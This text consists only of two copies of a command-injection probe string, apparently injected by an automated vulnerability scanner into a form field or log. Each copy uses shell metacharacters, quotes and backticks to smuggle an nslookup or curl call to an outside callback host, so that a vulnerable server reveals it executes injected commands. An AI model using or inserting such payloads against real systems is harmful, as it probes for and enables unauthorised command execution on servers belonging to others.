&(nslookup -q=cname hitoinxbxkabue2edd.bxss.me||curl hitoinxbxkabue2edd.bxss.me)&'\"`0&(nslookup -q=cname hitoinxbxkabue2edd.bxss.me||curl hitoinxbxkabue2edd.bxss.me)&`'

&(nslookup -q=cname hitoinxbxkabue2edd.bxss.me||curl hitoinxbxkabue2edd.bxss.me)&'\"`0&(nslookup -q=cname hitoinxbxkabue2edd.bxss.me||curl hitoinxbxkabue2edd.bxss.me)&`'